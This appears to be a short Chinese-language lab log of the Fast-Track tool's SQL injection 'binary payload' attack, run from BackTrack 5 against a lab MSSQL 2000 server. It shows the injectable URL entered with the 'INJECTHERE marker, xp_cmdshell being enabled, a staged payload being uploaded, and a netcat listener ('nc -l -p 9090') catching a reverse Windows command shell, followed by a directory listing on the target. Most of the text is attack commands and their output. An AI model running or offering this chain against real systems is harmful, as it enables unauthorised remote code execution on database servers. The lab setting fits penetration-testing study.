SQL Injector - GET Manual Setup Binary Payload Attack

bt5上操作：

 ***************************************************************** **                                                             ** **  Fast-Track - A new beginning...                            ** **  Version: 4.0.2                                             ** **  Written by: David Kennedy (ReL1K)                          ** **  Lead Developer: Joey Furr (j0fer)                          ** **  http://www.secmaniac.com                                   ** **                                                             ** *****************************************************************Enter which SQL Injector you want to use:    1. SQL Injector - Query String Parameter Attack    2. SQL Injector - POST Parameter Attack    3. SQL Injector - GET FTP Payload Attack    4. SQL Injector - GET Manual Setup Binary Payload Attack    (q)uit    Enter your choice: 4 ***************************************************************** **                                                             ** **  Fast-Track - A new beginning...                            ** **  Version: 4.0.2                                             ** **  Written by: David Kennedy (ReL1K)                          ** **  Lead Developer: Joey Furr (j0fer)                          ** **  http://www.secmaniac.com                                   ** **                                                             ** *****************************************************************    The manual portion allows you to customize your attack for whatever reason.    You will need to designate where in the URL the SQL Injection is by using 'INJECTHERE    So for example, when the tool asks you for the SQL Injectable URL, type:    http://www.thisisafakesite.com/blah.aspx?id='INJECTHERE&password=blah                 Enter the URL of the susceptible site, remember to put 'INJECTHERE for the injectible parameter    Example: http://www.thisisafakesite.com/blah.aspx?id='INJECTHERE&password=blah        <ctrl>-c to exit to Main Menu...        Enter here: http://192.168.1.109:8080/mssql2k/login?username='INJECTHEREEnter the IP Address of server with NetCat Listening: 192.168.1.11Enter Port number with NetCat listening: 9090    Sending initial request to enable xp_cmdshell if disabled....    Sending first portion of payload....    Sending second portion of payload....    Sending next portion of payload...    Sending the last portion of the payload...    Running cleanup...    Running the payload on the server...

另起一个bash运行nc获得了反向cmdshell：

root@bt:~# nc -l -p 9090Microsoft Windows XP [版本 5.1.2600](C) 版权所有 1985-2001 Microsoft Corp.C:\WINDOWS\system32>cd ..cd ..C:\WINDOWS>cd ..cd ..C:\>dirdir 驱动器 C 中的卷没有标签。 卷的序列号是 3052-FA52 C:\ 的目录2012-03-24  11:55                 0 AUTOEXEC.BAT2012-03-24  11:55                 0 CONFIG.SYS2012-03-24  11:59    <DIR>          Documents and Settings2013-07-02  21:45    <DIR>          msf32012-08-07  03:10       176,204,554 msf3.zip2004-12-29  13:07            61,440 nc.exe2013-07-01  22:45    <DIR>          Program Files2013-05-01  22:15        16,232,448 python-2.7.4.msi2013-07-06  17:57    <DIR>          Python272013-04-07  21:03        70,402,968 SQL2000SP4.exe2013-06-30  21:58    <DIR>          SQL2KSP42013-06-30  21:53    <DIR>          SQLEVAL2011-03-22  17:38       349,280,992 sqleval.exe2013-07-01  20:52    <DIR>          WINDOWS2013-05-22  20:55        20,868,704 Wireshark-win32-1.8.7.exe               8 个文件    633,051,106 字节               7 个目录  3,908,493,312 可用字节C:\>exitexitroot@bt:~#